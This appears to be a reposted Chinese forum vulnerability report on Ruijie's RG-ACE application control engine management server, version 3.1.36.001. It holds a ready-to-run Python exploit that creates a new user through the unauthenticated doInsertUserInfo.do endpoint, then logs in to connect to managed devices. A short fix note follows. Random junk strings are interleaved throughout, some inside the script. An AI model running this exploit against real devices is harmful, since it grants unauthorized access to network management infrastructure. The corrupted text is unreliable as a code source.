锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
3 z% ]5 Z: l8 m

测试的具体版本是
产品名称: 锐捷应用控制引擎
+ u- c! ~) Q* s& g1 k版本号: 3.1.36.001 TC
- C. ?+ K# S" x编译时间: 201104291730
" b2 G% j: l" K. B

; y3 b8 L7 `7 o! c3 o  R' t漏洞证明：
) g1 N) Q) T, l. w3 s
4 A2 V4 V7 w$ I) S

2 U, k; U3 R9 ~- Z

, U' I6 h3 X$ k" n/ Y- D4 L  c
执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
! C5 K( L3 j3 w1 G: H' Z("useractionname","addButtonValue"),
5 L: ]6 s; t. R. L$ _8 o: [("useropermanager","userManager"),
("userName","t"), #######账号自己加
! X9 _4 M- C3 K7 w1 u4 X("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
8 p# u1 F- X* h' l( e("email",""),
("mobilePhone",""),
("officePhone",""),
, y: r5 Y, H( [4 Q) K("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
$ V4 N& ?% d# }7 l2 |' X4 zprint "Done"

登录，连接设备

# `% T" P/ y% M$ ]. R% N

- P; D6 i' A0 V2 W

- C- k2 B2 n$ q& u默认的管理员admin权限更大点
( X( S/ H% V6 R7 S


8 R; r6 Q8 F% F5 z
" O4 y) s0 V, o8 r' E/ a% \
8 S. F8 {6 s+ s& z修复方案：
加强对接口的权限验证

$ |2 g- e" U! R0 Y+ L3 G